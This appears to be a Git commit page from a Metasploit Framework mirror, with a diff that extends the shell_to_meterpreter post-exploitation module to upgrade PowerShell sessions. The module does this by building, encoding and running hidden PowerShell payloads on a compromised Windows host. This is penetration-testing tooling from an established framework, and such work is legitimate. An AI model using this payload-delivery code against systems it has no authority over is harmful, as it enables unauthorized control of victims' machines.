infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5948, @bcook-r7's fix shell_to_meterpreter from powershell

bug/bundler_fix
jvazquez-r7 2015-10-02 15:59:43 -05:00
parent 2445c1fa32 953bfe1a81
commit c967b60bf8
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
5 changed files with 48 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
lib/msf/base/sessions/powershell.rb
View File

@ -27,6 +27,13 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
"powershell" "powershell"
end end
#
# Returns the session platform.
#
def platform
"win"
end
# #
# Returns the session description. # Returns the session description.
# #
@ -37,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
# #
# Takes over the shell_command of the parent # Takes over the shell_command of the parent
# #
def shell_command(cmd) def shell_command(cmd, timeout = 1800)
# insert random marker # insert random marker
strm = Rex::Text.rand_text_alpha(15) strm = Rex::Text.rand_text_alpha(15)
endm = Rex::Text.rand_text_alpha(15) endm = Rex::Text.rand_text_alpha(15)
@ -45,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
# Send the shell channel's stdin. # Send the shell channel's stdin.
shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n") shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n")
timeout = 1800 # 30 minute timeout
etime = ::Time.now.to_f + timeout etime = ::Time.now.to_f + timeout
buff = "" buff = ""

1
lib/msf/core/exploit/powershell.rb
View File

@ -147,7 +147,6 @@ module Exploit::Powershell
# @param ps_code [String] Powershell code # @param ps_code [String] Powershell code
# @param payload_arch [String] The payload architecture 'x86'/'x86_64' # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
# @param encoded [Boolean] Indicates whether ps_code is encoded or not # @param encoded [Boolean] Indicates whether ps_code is encoded or not
#
# @return [String] Wrapped powershell code # @return [String] Wrapped powershell code
def run_hidden_psh(ps_code, payload_arch, encoded) def run_hidden_psh(ps_code, payload_arch, encoded)
arg_opts = { arg_opts = {

7
lib/msf/core/post/common.rb
View File

@ -198,6 +198,13 @@ module Msf::Post::Common
end end
process.close process.close
when /powershell/
if args.nil? || args.empty?
o = session.shell_command("#{cmd}", time_out)
else
o = session.shell_command("#{cmd} #{args}", time_out)
end
o.chomp! if o
when /shell/ when /shell/
if args.nil? || args.empty? if args.nil? || args.empty?
o = session.shell_command_token("#{cmd}", time_out) o = session.shell_command_token("#{cmd}", time_out)

4
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -1921,12 +1921,12 @@ class Core
session.response_timeout = response_timeout session.response_timeout = response_timeout
end end
begin begin
if session.type == 'shell' if ['shell', 'powershell'].include?(session.type)
session.init_ui(driver.input, driver.output) session.init_ui(driver.input, driver.output)
session.execute_script('post/multi/manage/shell_to_meterpreter') session.execute_script('post/multi/manage/shell_to_meterpreter')
session.reset_ui session.reset_ui
else else
print_error("Session #{sess_id} is not a command shell session, skipping...") print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...")
next next
end end
ensure ensure

40
modules/post/multi/manage/shell_to_meterpreter.rb
View File

@ -128,15 +128,37 @@ class Metasploit3 < Msf::Post
case platform case platform
when 'win' when 'win'
if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS') if session.type == 'powershell'
vprint_status("Transfer method: Powershell") template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts')
psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false } psh_payload = case datastore['Powershell::method']
cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts)) when 'net'
else Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data)
print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL' when 'reflection'
vprint_status("Transfer method: VBS [fallback]") Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data)
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data) when 'old'
aborted = transmit_payload(exe) Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data)
when 'msil'
fail RuntimeError, 'MSIL Powershell method no longer exists'
else
fail RuntimeError, 'No Powershell method specified'
end
# prepend_sleep => 1
psh_payload = 'Start-Sleep -s 1;' << psh_payload
encoded_psh_payload = encode_script(psh_payload)
cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
else # shell
if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
vprint_status("Transfer method: Powershell")
psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
else
print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
vprint_status("Transfer method: VBS [fallback]")
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
aborted = transmit_payload(exe)
end
end end
when 'python' when 'python'
vprint_status("Transfer method: Python") vprint_status("Transfer method: Python")